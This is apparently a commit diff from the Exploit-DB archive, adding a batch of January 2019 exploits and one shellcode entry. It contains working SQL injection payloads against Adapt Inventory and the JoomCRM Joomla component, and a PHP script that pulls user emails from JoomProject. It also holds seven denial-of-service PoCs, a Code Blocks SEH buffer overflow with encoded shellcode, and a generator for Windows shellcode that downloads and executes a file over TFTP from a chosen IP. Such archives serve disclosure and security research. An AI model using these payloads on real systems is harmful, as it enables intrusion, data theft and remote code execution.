DB: 2019-01-12

12 changes to exploits/shellcodes

Selfie Studio 2.17 - Denial of Service (PoC)
Tree Studio 2.17 - Denial of Service (PoC)
Paint Studio 2.17 - Denial of Service (PoC)
Pixel Studio 2.17 - Denial of Service (PoC)
Liquid Studio 2.17 - Denial of Service (PoC)
Blob Studio 2.17 - Denial of Service (PoC)
Luminance Studio 2.17 - Denial of Service (PoC)

Code Blocks 17.12 - Local Buffer Overflow (SEH) (Unicode)
Adapt Inventory Management System 1.0 - SQL Injection
Joomla! Component JoomProject 1.1.3.2 - Information Disclosure
Joomla! Component JoomCRM 1.1.1 - SQL Injection

Windows/x86 - Download With TFTP And Execute Shellcode (51-60 bytes) (Generator)

exploits/php/webapps/46119.txt

@@ -0,0 +1,67 @@
+# Exploit Title: Adapt Inventory Management System 1.0 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-10
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.adaptinventory.com/
+# Software Link: https://codecanyon.net/item/adapt-inventory-management-system/22838514
+# Version: 1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1) 
+# http://localhost/[PATH]/admin/login.php
+# 
+
+POST /[PATH]/admin/login.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 280
+Cookie: PHPSESSID=e23redq9bp28kar813ggnk4g87
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+username=12'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&password=%27: undefined
+HTTP/1.1 200 OK
+Date: Thu, 10 Jan 2019 18:14:53 GMT
+Server: Apache
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Vary: Accept-Encoding,User-Agent
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: application/json
+Transfer-Encoding: chunked
+
+# POC: 
+# 2) 
+# http://localhost/[PATH]/admin/invoice.php?i=[SQL]
+# 
+
+GET /[PATH]/admin/invoice.php?i=-1%27%20UNION%20SELECT%200x30783331,0x32,0x33,0x34,0x35,0x36,0x37,0x38,0x39,(SELECT%20(@x)%20FROM%20(SELECT%20(@x:=0x00),(@NR_DB:=0),(SELECT%20(0)%20FROM%20(INFORMATION_SCHEMA.SCHEMATA)%20WHERE%20(@x)%20IN%20(@x:=CONCAT(@x,LPAD(@NR_DB:=@NR_DB%2b1,2,0x30),0x20203a2020,schema_name,0x3c62723e))))x),0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232,0x3233,0x3234,0x3235,0x3236,0x3237--%20- HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate, br
+Cookie: PHPSESSID=e23redq9bp28kar813ggnk4g87
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 200 OK
+Date: Thu, 10 Jan 2019 18:06:12 GMT
+Server: Apache
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Vary: Accept-Encoding,User-Agent
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked

exploits/php/webapps/46121.txt

@@ -0,0 +1,29 @@
+# Exploit Title: Joomla! Component JoomProject 1.1.3.2 - Information Disclosure
+# Dork: N/A
+# Date: 2019-01-11
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://joomboost.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/project-a-task-management/joomproject/
+# Version: 1.1.3.2
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1) 
+<?php
+header ('Content-type: text/html; charset=UTF-8');
+$url= "http://localhost/[PATH]/";
+$p="index.php?option=com_jpprojects&view=projects&tmpl=component&format=json";
+$url = file_get_contents($url.$p);
+$l = json_decode($url, true);
+if($l){
+	echo "*-----------------------------*<br />";
+foreach($l as $u){
+	echo "[-] ID\n\n\n\n:\n" .$u['id']."<br />";
+	echo "[-] Name\n\n:\n" .$u['author_name']."<br />";
+	echo "[-] Email\n:\n" .$u['author_email']."<br />";
+	echo "<br>";
+}echo "*-----------------------------*";} 
+else{echo "[-] No user";}
+?>

exploits/php/webapps/46122.txt

@@ -0,0 +1,63 @@
+# Exploit Title: Joomla! Component JoomCRM 1.1.1 - SQL Injection
+# Dork: N/A
+# Date: 2019-01-11
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://joomboost.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/marketing/crm/joomcrm/
+# Version: 1.1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1) 
+# http://localhost/[PATH]/index.php?option=com_joomcrm&view=contacts&format=raw&loc=deal&tmpl=component&deal_id=[SQL]
+# 
+
+GET /[PATH]/index.php?option=com_joomcrm&view=contacts&format=raw&loc=deal&tmpl=component&deal_id=31%39%20A%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52OM%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41T%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53E()%20%41%53%20%43%48%41%52%29%2c%30%78%37%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3dDAT%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4fRMA%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie: __cfduid=d32095db21c106516d53cae46d08e3e291547158024; 5cccc826c28cb27e67933089ce2566a0=1ad52e59a11808d25fa5e93d022c74f3; joomla_user_state=logged_in
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+HTTP/1.1 500 Internal Server Error
+Date: Thu, 10 Jan 2019 22:19:34 GMT
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+X-Powered-By: PHP/7.1.18
+Alt-Svc: h2=":443"; ma=60
+Server: cloudflare
+CF-RAY: 4972869f86167a82-LAX
+
+# POC: 
+# 2) 
+# http://localhost/[PATH]/index.php?option=com_joomcrm&view=events&layout=event_listings&format=raw&tmpl=component
+# 
+
+POST /[PATH]/index.php?option=com_joomcrm&view=events&layout=event_listings&format=raw&tmpl=component HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 758
+Cookie: __cfduid=d32095db21c106516d53cae46d08e3e291547158024; 5cccc826c28cb27e67933089ce2566a0=1ad52e59a11808d25fa5e93d022c74f3; joomla_user_state=logged_in
+DNT: 1
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+assignee_id=1&assignee_filter_type=individual&association_type=deal&association_id=47%39%20A%4e%44%28%53%45%4c%45%43%54%20%31%20%46%52OM%20%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41T%28%28%53%45%4c%45%43%54%28%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%28%43%41%53%54%28%44%41%54%41%42%41%53E()%20%41%53%20%43%48%41%52%29%2c%30%78%37%65%29%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3dDAT%41%42%41%53%45%28%29%20%4c%49%4d%49%54%20%30%2c%31%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4fRMA%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29: undefined
+HTTP/1.1 500 Internal Server Error
+Date: Thu, 10 Jan 2019 22:21:40 GMT
+Content-Type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Connection: keep-alive
+X-Powered-By: PHP/7.1.18
+Alt-Svc: h2=":443"; ma=60
+Server: cloudflare
+CF-RAY: 497289b65710775a-LAX

exploits/windows/dos/46124.py

@@ -0,0 +1,29 @@
+# Exploit Title: Selfie Studio 2.17 - Denial of Service (PoC)
+# Dork: N/A
+# Date: 2019-01-11
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.pixarra.com/
+# Software Link: http://www.pixarra.com/uploads/9/4/6/3/94635436/tbselfiestudio_install.exe
+# Version: 2.17
+# Category: Dos
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# Selfie Studio Run / Enter Key...
+# Any character.
+
+#!/usr/bin/python
+    
+buffer = "A" * 10
+ 
+payload = buffer
+try:
+    f=open("exp.txt","w")
+    print "[+] Creating %s bytes evil payload." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created."

exploits/windows/dos/46125.py

@@ -0,0 +1,29 @@
+# Exploit Title: Tree Studio 2.17 - Denial of Service (PoC)
+# Dork: N/A
+# Date: 2019-01-11
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.pixarra.com/
+# Software Link: http://www.pixarra.com/uploads/9/4/6/3/94635436/tbtreestudio_install.exe
+# Version: 2.17
+# Category: Dos
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# Tree Studio Run / Enter Key...
+# Any character.
+
+#!/usr/bin/python
+    
+buffer = "A" * 10
+ 
+payload = buffer
+try:
+    f=open("exp.txt","w")
+    print "[+] Creating %s bytes evil payload." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created."

exploits/windows/dos/46126.py

@@ -0,0 +1,29 @@
+# Exploit Title: Paint Studio 2.17 - Denial of Service (PoC)
+# Dork: N/A
+# Date: 2019-01-11
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.pixarra.com/
+# Software Link: http://www.pixarra.com/uploads/9/4/6/3/94635436/tbpaintstudio_install.exe
+# Version: 2.17
+# Category: Dos
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# Paint Studio Run / Enter Key...
+# Any character.
+
+#!/usr/bin/python
+    
+buffer = "A" * 10
+ 
+payload = buffer
+try:
+    f=open("exp.txt","w")
+    print "[+] Creating %s bytes evil payload." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created."

exploits/windows/dos/46127.py

@@ -0,0 +1,29 @@
+# Exploit Title: Pixel Studio 2.17 - Denial of Service (PoC)
+# Dork: N/A
+# Date: 2019-01-11
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.pixarra.com/
+# Software Link: http://www.pixarra.com/uploads/9/4/6/3/94635436/tbpixelstudio_install.exe
+# Version: 2.17
+# Category: Dos
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# Pixel Studio Run / Enter Key...
+# Any character.
+
+#!/usr/bin/python
+    
+buffer = "A" * 10
+ 
+payload = buffer
+try:
+    f=open("exp.txt","w")
+    print "[+] Creating %s bytes evil payload." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created."

exploits/windows/dos/46128.py

@@ -0,0 +1,29 @@
+# Exploit Title: Liquid Studio 2.17 - Denial of Service (PoC)
+# Dork: N/A
+# Date: 2019-01-11
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.pixarra.com/
+# Software Link: http://www.pixarra.com/uploads/9/4/6/3/94635436/tbliquidstudio_install.exe
+# Version: 2.17
+# Category: Dos
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# Liquid Studio Run / Enter Key...
+# Any character.
+
+#!/usr/bin/python
+    
+buffer = "A" * 10
+ 
+payload = buffer
+try:
+    f=open("exp.txt","w")
+    print "[+] Creating %s bytes evil payload." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created."

exploits/windows/dos/46129.py

@@ -0,0 +1,29 @@
+# Exploit Title: Blob Studio 2.17 - Denial of Service (PoC)
+# Dork: N/A
+# Date: 2019-01-11
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.pixarra.com/
+# Software Link: http://www.pixarra.com/uploads/9/4/6/3/94635436/tbblobstudio_install.exe
+# Version: 2.17
+# Category: Dos
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# Blob Studio Run / Enter Key...
+# Any character.
+
+#!/usr/bin/python
+    
+buffer = "A" * 10
+ 
+payload = buffer
+try:
+    f=open("exp.txt","w")
+    print "[+] Creating %s bytes evil payload." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created."

exploits/windows/dos/46130.py

@@ -0,0 +1,29 @@
+# Exploit Title: Luminance Studio 2.17 - Denial of Service (PoC)
+# Dork: N/A
+# Date: 2019-01-11
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.pixarra.com/
+# Software Link: http://www.pixarra.com/uploads/9/4/6/3/94635436/tbluminancestudio_install.exe
+# Version: 2.17
+# Category: Dos
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# Luminance Studio Run / Enter Key...
+# Any character.
+
+#!/usr/bin/python
+    
+buffer = "A" * 10
+ 
+payload = buffer
+try:
+    f=open("exp.txt","w")
+    print "[+] Creating %s bytes evil payload." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created."

exploits/windows/local/46120.py

@@ -0,0 +1,71 @@
+#!/usr/bin/python
+
+#
+# Exploit Author: bzyo
+# Twitter: @bzyo_
+# Exploit Title:  Code Blocks 17.12 - Local Buffer Overflow (SEH)(Unicode)
+# Date: 01-10-2019
+# Vulnerable Software: Code Blocks 17.12
+# Vendor Homepage: http://www.codeblocks.org/
+# Version: 17.12
+# Software Link:
+# http://sourceforge.net/projects/codeblocks/files/Binaries/17.12/Windows/codeblocks-17.12-setup.exe
+# Tested Windows 7 SP1 x86
+#
+#
+# PoC
+# 1. generate codeblocks.txt, copy contents to clipboard
+# 2. open cold blocks app
+# 3. select File, New, Class
+# 4. paste contents from clipboard into Class name
+# 5. select Create
+# 6. pop calc
+#
+
+filename = "codeblocks.txt"
+
+
+junk = "A"*1982
+
+
+nseh = "\x61\x62"
+
+#0x005000e0 pop edi # pop ebp # ret  | startnull,unicode {PAGE_EXECUTE_READ} [codeblocks.exe]
+seh = "\xe0\x50"
+
+nops = "\x47"*10
+
+valign = (
+"\x53" 				#push ebx
+"\x47" 				#align
+"\x58" 				#pop eax
+"\x47"                          #align
+"\x47"                          #align
+"\x05\x28\x11" 	                #add eax  
+"\x47"                          #align
+"\x2d\x13\x11"                  #sub eax
+"\x47"				#align
+"\x50"				#push eax
+"\x47"				#align
+"\xc3"				#retn
+)
+
+nops_sled = "\x47"*28
+
+#msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_upper BufferRegister=EAX
+#Payload size: 517 bytes
+calc = (
+"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1A"
+"IQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLIXDBM0KPKP1PU9ZE01I0RD4KPPP0DK0RLL4KB2MD4KRRN"
+"HLO6WOZNFP1KOFLOLC13LKRNLMPI18OLMM17W9RKBB21GTKPRLPDKPJOL4K0LN1RXZCPHKQZ1PQ4K29O0KQXS4KOY"
+"N8YSOJOYDKNT4KKQXV01KOFLY18OLMM1GWOH9PSEKFM3SMZXOKSMNDT5ITPXDKPXMTKQ8SC6TKLL0KTKPXMLM1YCD"
+"KLDTKM1J0SYOTMTMTQKQKS10YQJB1KOIPQO1OQJ4KMBZK4MQM2JKQ4MTEX2KPKPKPPP2HP1TKBOTGKOZ5GKJP6UVB"
+"0V2HW65EGM5MKO8UOLLFSLLJU0KKIPRUKUWK0GMCCBRORJKPB3KOIE2CC1RLQSNNQU2X35M0AA")
+
+fill = "D"*10000
+
+buffer = junk + nseh + seh + nops + valign + nops_sled + calc + fill
+
+textfile = open(filename , 'w')
+textfile.write(buffer)
+textfile.close()

files_exploits.csv

@@ -6242,6 +6242,13 @@ id,file,description,date,author,type,platform,port
 46099,exploits/multiple/dos/46099.html,"Google Chrome V8 JavaScript Engine 71.0.3578.98 - Out-of-Memory. Denial of Service (PoC)",2019-01-09,"Bogdan Kurinnoy",dos,multiple,
 46101,exploits/windows/dos/46101.rb,"Microsoft Office SharePoint Server 2016 - Denial of Service (Metasploit)",2019-01-09,"Gal Zror",dos,windows,443
 46105,exploits/linux/dos/46105.c,"polkit - Temporary auth Hijacking via PID Reuse and Non-atomic Fork",2019-01-09,"Google Security Research",dos,linux,
+46124,exploits/windows/dos/46124.py,"Selfie Studio 2.17 - Denial of Service (PoC)",2019-01-11,"Ihsan Sencan",dos,windows,
+46125,exploits/windows/dos/46125.py,"Tree Studio 2.17 - Denial of Service (PoC)",2019-01-11,"Ihsan Sencan",dos,windows,
+46126,exploits/windows/dos/46126.py,"Paint Studio 2.17 - Denial of Service (PoC)",2019-01-11,"Ihsan Sencan",dos,windows,
+46127,exploits/windows/dos/46127.py,"Pixel Studio 2.17 - Denial of Service (PoC)",2019-01-11,"Ihsan Sencan",dos,windows,
+46128,exploits/windows/dos/46128.py,"Liquid Studio 2.17 - Denial of Service (PoC)",2019-01-11,"Ihsan Sencan",dos,windows,
+46129,exploits/windows/dos/46129.py,"Blob Studio 2.17 - Denial of Service (PoC)",2019-01-11,"Ihsan Sencan",dos,windows,
+46130,exploits/windows/dos/46130.py,"Luminance Studio 2.17 - Denial of Service (PoC)",2019-01-11,"Ihsan Sencan",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10196,6 +10203,7 @@ id,file,description,date,author,type,platform,port
 46098,exploits/windows/local/46098.txt,"Microsoft Windows - Windows Error Reporting Local Privilege Escalation",2019-01-02,SandboxEscaper,local,windows,
 46104,exploits/windows/local/46104.txt,"Microsoft Windows - DSSVC CheckFilePermission Arbitrary File Deletion",2019-01-09,"Google Security Research",local,windows,
 46107,exploits/windows/local/46107.py,"RGui 3.5.0 - Local Buffer Overflow (SEH)(DEP Bypass)",2019-01-10,bzyo,local,windows,
+46120,exploits/windows/local/46120.py,"Code Blocks 17.12 - Local Buffer Overflow (SEH) (Unicode)",2019-01-11,bzyo,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -40601,3 +40609,6 @@ id,file,description,date,author,type,platform,port
 46116,exploits/php/webapps/46116.txt,"Event Locations 1.0.1 - 'id' SQL Injection",2019-01-10,"Ihsan Sencan",webapps,php,80
 46117,exploits/php/webapps/46117.txt,"eBrigade ERP 4.5 - SQL Injection",2019-01-10,"Ihsan Sencan",webapps,php,80
 46118,exploits/multiple/webapps/46118.txt,"OpenSource ERP 6.3.1. - SQL Injection",2019-01-10,"Emre ÖVÜNÇ",webapps,multiple,80
+46119,exploits/php/webapps/46119.txt,"Adapt Inventory Management System 1.0 - SQL Injection",2019-01-11,"Ihsan Sencan",webapps,php,80
+46121,exploits/php/webapps/46121.txt,"Joomla! Component JoomProject 1.1.3.2 - Information Disclosure",2019-01-11,"Ihsan Sencan",webapps,php,80
+46122,exploits/php/webapps/46122.txt,"Joomla! Component JoomCRM 1.1.1 - SQL Injection",2019-01-11,"Ihsan Sencan",webapps,php,80

files_shellcodes.csv

@@ -929,3 +929,4 @@ id,file,description,date,author,type,platform
 46007,shellcodes/linux_x86-64/46007.c,"Linux/x64 - Disable ASLR Security Shellcode (93 Bytes)",2018-12-19,"Kağan Çapar",shellcode,linux_x86-64
 46039,shellcodes/linux/46039.c,"Linux/x86 - Kill All Processes Shellcode (14 bytes)",2018-12-24,strider,shellcode,linux
 46103,shellcodes/linux_x86/46103.c,"Linux/x86 - wget chmod execute over execve /bin/sh -c Shellcode (119 bytes)",2019-01-09,strider,shellcode,linux_x86
+46123,shellcodes/generator/46123.py,"Windows/x86 - Download With TFTP And Execute Shellcode (51-60 bytes) (Generator)",2019-01-11,"Semen Alexandrovich Lyhin",shellcode,generator

shellcodes/generator/46123.py

@@ -0,0 +1,39 @@
+#!/bin/python
+
+#Author: Semen Alexandrovich Lyhin.
+#https://www.linkedin.com/in/semenlyhin/
+#This script generates x86 shellcode to download and execute .exe file via tftp. File name should be equal to: "1.exe"
+#Lenght: 51-56 bytes, zero-free.
+
+import sys
+
+def GetOpcodes(ip,addr):
+    command = r"tftp -i " + ip + r" GET 1.exe&1"
+    #add spaces, if required.
+    command += (4-len(command)%4)%4*" "
+    
+    #calculate opcodes for the command
+    opcodes = ""
+    for s in [command[i:i+4] for i in xrange(0,len(command),4)][::-1]: #split by 4-char strings and reverse order of the strings in the list
+        opcodes += "68" #push
+        for char in s:
+            opcodes += hex(ord(char))[2:].zfill(2)
+
+    #zero out eax and push it. If there is zeroed register, we can simplify this operation.  Check it manually.
+    opcodes = "33C050" + opcodes
+    #push esp. Modify this part, to make program stabler. #mov eax,esp #push eax
+    opcodes += "54" 
+    #move addr of msvcrt.system to ebx
+    opcodes += "BB" + addr
+    #call ebx    
+    opcodes += "FFD3" 
+    return opcodes
+
+if __name__ == "__main__":
+    if len(sys.argv)!=3:
+        print "Usage: " + sys.argv[0] + " <ip> <address of msvcrt.system>"
+        print "Address of msvcrt.system == C793C277 for Windows XP Professional SP3"
+        exit()
+    opcodes = GetOpcodes(sys.argv[1],sys.argv[2])
+    print opcodes
+    print "Lenght:" + str(len(opcodes)/2)